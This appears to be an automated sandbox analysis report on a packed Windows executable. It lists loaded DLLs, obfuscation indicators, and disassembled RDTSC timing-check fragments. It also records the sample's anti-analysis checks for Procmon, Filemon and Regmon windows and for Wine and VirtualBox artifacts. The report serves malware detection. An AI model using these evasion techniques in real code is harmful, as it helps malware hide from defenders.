Source: C:\Users\user\Desktop\0gnHF2twcT.exe Section loaded: ntasn1.dll
Source: C:\Users\user\Desktop\0gnHF2twcT.exe Section loaded: ncrypt.dll
Source: C:\Users\user\Desktop\0gnHF2twcT.exe Section loaded: ncryptsslp.dll
Source: C:\Users\user\Desktop\0gnHF2twcT.exe Section loaded: msasn1.dll
Source: C:\Users\user\Desktop\0gnHF2twcT.exe Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\0gnHF2twcT.exe Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\0gnHF2twcT.exe Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\0gnHF2twcT.exe Section loaded: gpapi.dll
Source: C:\Users\user\Desktop\0gnHF2twcT.exe Section loaded: dpapi.dll
Source: C:\Users\user\Desktop\0gnHF2twcT.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\0gnHF2twcT.exe Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\0gnHF2twcT.exe Section loaded: wbemcomn.dll
Source: C:\Users\user\Desktop\0gnHF2twcT.exe Section loaded: amsi.dll
Source: C:\Users\user\Desktop\0gnHF2twcT.exe Section loaded: userenv.dll
Source: C:\Users\user\Desktop\0gnHF2twcT.exe Section loaded: profapi.dll
Source: C:\Users\user\Desktop\0gnHF2twcT.exe Section loaded: version.dll
Source: 0gnHF2twcT.exe Static file information: File size 1881600 > 1048576
Source: 0gnHF2twcT.exe Static PE information: Raw size of mimqpfga is bigger than: 0x100000 < 0x1a3200

Data Obfuscation

Source: C:\Users\user\Desktop\0gnHF2twcT.exe Unpacked PE file: 0.2.0gnHF2twcT.exe.70000.0.unpack :EW;.rsrc:W;.idata :W; :EW;mimqpfga:EW;grnkiruz:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;mimqpfga:EW;grnkiruz:EW;.taggant:EW;
Source: initial sample Static PE information: section where entry point is pointing to: .taggant
Source: 0gnHF2twcT.exe Static PE information: real checksum: 0x1cffc8 should be: 0x1ce053
Source: 0gnHF2twcT.exe Static PE information: section name:
Source: 0gnHF2twcT.exe Static PE information: section name: .idata
Source: 0gnHF2twcT.exe Static PE information: section name:
Source: 0gnHF2twcT.exe Static PE information: section name: mimqpfga
Source: 0gnHF2twcT.exe Static PE information: section name: grnkiruz
Source: 0gnHF2twcT.exe Static PE information: section name: .taggant
Source: C:\Users\user\Desktop\0gnHF2twcT.exe Code function: 0_3_00A39AAF push FFFFFFDBh; iretd 0_3_00A39AC0
Source: C:\Users\user\Desktop\0gnHF2twcT.exe Code function: 0_3_00A39F2D push esi; retf 0_3_00A39F30
Source: C:\Users\user\Desktop\0gnHF2twcT.exe Code function: 0_3_00A321CA push ecx; ret 0_3_00A324EA
Source: 0gnHF2twcT.exe Static PE information: section name: entropy: 7.980219456440776
Source: 0gnHF2twcT.exe Static PE information: section name: mimqpfga entropy: 7.95348924063239

Boot Survival

Source: C:\Users\user\Desktop\0gnHF2twcT.exe Window searched: window name: FilemonClass
Source: C:\Users\user\Desktop\0gnHF2twcT.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\Desktop\0gnHF2twcT.exe Window searched: window name: RegmonClass
Source: C:\Users\user\Desktop\0gnHF2twcT.exe Window searched: window name: Regmonclass
Source: C:\Users\user\Desktop\0gnHF2twcT.exe Window searched: window name: Filemonclass
Source: C:\Users\user\Desktop\0gnHF2twcT.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
Source: C:\Users\user\Desktop\0gnHF2twcT.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
Source: C:\Users\user\Desktop\0gnHF2twcT.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: C:\Users\user\Desktop\0gnHF2twcT.exe System information queried: FirmwareTableInformation
Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 249F42 second address: 249F47 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 249F47 second address: 249FA9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F05491602D6h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d add dword ptr [esp], 163435DBh 0x00000014 mov cl, EAh 0x00000016 push 00000003h 0x00000018 mov dword ptr [ebp+122D2AC2h], ebx 0x0000001e push 00000000h 0x00000020 jmp 00007F05491602E6h 0x00000025 push 00000003h 0x00000027 or dword ptr [ebp+122D298Bh], ecx 0x0000002d push 87DEDFDCh 0x00000032 push eax 0x00000033 push edx 0x00000034 jng 00007F05491602EDh 0x0000003a jmp 00007F05491602E7h 0x0000003f rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 249FA9 second address: 24A011 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F0549119942h 0x00000008 jmp 00007F054911993Ch 0x0000000d pop edx 0x0000000e pop eax 0x0000000f xor dword ptr [esp], 47DEDFDCh 0x00000016 push 00000000h 0x00000018 push eax 0x00000019 call 00007F0549119938h 0x0000001e pop eax 0x0000001f mov dword ptr [esp+04h], eax 0x00000023 add dword ptr [esp+04h], 0000001Ah 0x0000002b inc eax 0x0000002c push eax 0x0000002d ret 0x0000002e pop eax 0x0000002f ret 0x00000030 lea ebx, dword ptr [ebp+12455D28h] 0x00000036 jmp 00007F0549119942h 0x0000003b sub esi, dword ptr [ebp+122D2EE0h] 0x00000041 push eax 0x00000042 push eax 0x00000043 push edx 0x00000044 jo 00007F054911993Ch 0x0000004a push eax 0x0000004b push edx 0x0000004c rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 24A011 second address: 24A015 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 24A015 second address: 24A01A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 24A06E second address: 24A0A7 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jno 00007F05491602D6h 0x0000000d push esi 0x0000000e pop esi 0x0000000f popad 0x00000010 popad 0x00000011 mov dword ptr [esp], eax 0x00000014 and ecx, dword ptr [ebp+122D2B43h] 0x0000001a add dword ptr [ebp+122D2CE2h], ebx 0x00000020 push 00000000h 0x00000022 sub esi, dword ptr [ebp+122D29A1h] 0x00000028 push 390B6A6Fh 0x0000002d push eax 0x0000002e push edx 0x0000002f pushad 0x00000030 pushad 0x00000031 popad 0x00000032 jns 00007F05491602D6h 0x00000038 popad 0x00000039 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 24A0A7 second address: 24A122 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0549119942h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xor dword ptr [esp], 390B6AEFh 0x00000010 mov cx, 7DCAh 0x00000014 push 00000003h 0x00000016 mov di, A54Dh 0x0000001a push 00000000h 0x0000001c cmc 0x0000001d push 00000003h 0x0000001f call 00007F0549119939h 0x00000024 jmp 00007F0549119947h 0x00000029 push eax 0x0000002a pushad 0x0000002b jmp 00007F0549119948h 0x00000030 push edi 0x00000031 push esi 0x00000032 pop esi 0x00000033 pop edi 0x00000034 popad 0x00000035 mov eax, dword ptr [esp+04h] 0x00000039 push eax 0x0000003a push edx 0x0000003b jmp 00007F054911993Ah 0x00000040 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 24A122 second address: 24A127 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 24A127 second address: 24A14F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov eax, dword ptr [eax] 0x00000009 pushad 0x0000000a pushad 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d push edx 0x0000000e pop edx 0x0000000f popad 0x00000010 pushad 0x00000011 jmp 00007F0549119945h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 24A1F5 second address: 24A1FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 24A1FF second address: 24A235 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 jmp 00007F054911993Ah 0x0000000c nop 0x0000000d and dh, FFFFFFE1h 0x00000010 push 00000000h 0x00000012 push 8D5E998Ah 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007F0549119948h 0x0000001e rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 24A235 second address: 24A23B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 25C9A5 second address: 25C9AA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 25C9AA second address: 25C9D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F05491602E2h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jng 00007F05491602E1h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 26A402 second address: 26A426 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F054911993Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F0549119941h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 26A426 second address: 26A440 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F05491602E0h 0x00000007 jbe 00007F05491602DCh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 26816F second address: 268186 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jmp 00007F054911993Dh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 268186 second address: 26818C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 26818C second address: 268190 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 268190 second address: 2681B2 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 jmp 00007F05491602E8h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 2681B2 second address: 2681C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F054911993Dh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 2681C3 second address: 2681E9 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F05491602D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edi 0x0000000b pushad 0x0000000c popad 0x0000000d pushad 0x0000000e popad 0x0000000f pop edi 0x00000010 popad 0x00000011 pushad 0x00000012 push eax 0x00000013 pushad 0x00000014 popad 0x00000015 push ebx 0x00000016 pop ebx 0x00000017 pop eax 0x00000018 push eax 0x00000019 pushad 0x0000001a popad 0x0000001b pop eax 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f popad 0x00000020 jo 00007F05491602D6h 0x00000026 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 268487 second address: 26848F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 26848F second address: 268495 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 2685C4 second address: 2685C8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 268710 second address: 268716 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 268716 second address: 268735 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007F0549119948h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 268D0B second address: 268D0F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 268D0F second address: 268D28 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F0549119940h 0x0000000b push ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 268E86 second address: 268EA5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F05491602E8h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 268EA5 second address: 268EA9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 268EA9 second address: 268EC4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F05491602E2h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 26900A second address: 269014 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 269014 second address: 269018 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 269018 second address: 269033 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 jmp 00007F0549119942h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 269033 second address: 26904E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 popad 0x00000006 pushad 0x00000007 jng 00007F05491602DCh 0x0000000d ja 00007F05491602DCh 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 26904E second address: 269062 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jmp 00007F054911993Ch 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 269062 second address: 269066 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 269066 second address: 26906C instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 26933E second address: 269346 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 2694DC second address: 2694F7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F054911993Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F054911993Ch 0x0000000e rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 2694F7 second address: 2694FF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 2694FF second address: 26950F instructions: 0x00000000 rdtsc 0x00000002 jl 00007F0549119936h 0x00000008 push edx 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 269AC4 second address: 269AC8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 269AC8 second address: 269ACC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 269ACC second address: 269AD4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 269AD4 second address: 269ADA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 269ADA second address: 269ADE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 269ADE second address: 269AE2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 269DD3 second address: 269DD7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 269DD7 second address: 269DF1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 ja 00007F0549119936h 0x0000000e jmp 00007F054911993Ch 0x00000013 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 269DF1 second address: 269DFB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 26B979 second address: 26B97F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 26B97F second address: 26B994 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F05491602DAh 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 26B994 second address: 26B998 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 26B998 second address: 26B99C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 26CEA0 second address: 26CEA4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 2753FF second address: 275436 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jo 00007F05491602D6h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f jnl 00007F05491602DEh 0x00000015 mov eax, dword ptr [esp+04h] 0x00000019 jng 00007F05491602ECh 0x0000001f push eax 0x00000020 push edx 0x00000021 jmp 00007F05491602DEh 0x00000026 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 27436C second address: 274370 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 27A5E1 second address: 27A5E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 27A5E6 second address: 27A5EB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 27A5EB second address: 27A615 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jmp 00007F05491602E3h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e js 00007F05491602DEh 0x00000014 push ecx 0x00000015 pop ecx 0x00000016 jng 00007F05491602D6h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 279DE2 second address: 279DE7 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 279F9D second address: 279FA7 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F05491602D6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 27A386 second address: 27A38A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 23BB43 second address: 23BB49 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 23BB49 second address: 23BB5F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F054911993Bh 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 27C300 second address: 27C31C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F05491602DDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop eax 0x0000000a push eax 0x0000000b push ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e jnp 00007F05491602D6h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 27C3BA second address: 27C455 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jbe 00007F054911994Ah 0x0000000c jmp 00007F0549119944h 0x00000011 popad 0x00000012 add dword ptr [esp], 2D96D14Fh 0x00000019 push 00000000h 0x0000001b push ecx 0x0000001c call 00007F0549119938h 0x00000021 pop ecx 0x00000022 mov dword ptr [esp+04h], ecx 0x00000026 add dword ptr [esp+04h], 00000019h 0x0000002e inc ecx 0x0000002f push ecx 0x00000030 ret 0x00000031 pop ecx 0x00000032 ret 0x00000033 mov dword ptr [ebp+122D1CA7h], ecx 0x00000039 call 00007F0549119939h 0x0000003e pushad 0x0000003f pushad 0x00000040 jmp 00007F054911993Fh 0x00000045 push ebx 0x00000046 pop ebx 0x00000047 popad 0x00000048 pushad 0x00000049 push esi 0x0000004a pop esi 0x0000004b push eax 0x0000004c pop eax 0x0000004d popad 0x0000004e popad 0x0000004f push eax 0x00000050 pushad 0x00000051 jmp 00007F054911993Bh 0x00000056 push eax 0x00000057 push edx 0x00000058 jmp 00007F0549119949h 0x0000005d rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 27C455 second address: 27C478 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F05491602D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b mov eax, dword ptr [esp+04h] 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F05491602E2h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 27C478 second address: 27C4C1 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 js 00007F0549119936h 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, dword ptr [eax] 0x0000000e pushad 0x0000000f pushad 0x00000010 jp 00007F0549119936h 0x00000016 jmp 00007F0549119941h 0x0000001b popad 0x0000001c js 00007F0549119938h 0x00000022 push edx 0x00000023 pop edx 0x00000024 popad 0x00000025 mov dword ptr [esp+04h], eax 0x00000029 push eax 0x0000002a push edx 0x0000002b jmp 00007F0549119942h 0x00000030 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 27C4C1 second address: 27C4C6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 27C733 second address: 27C737 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
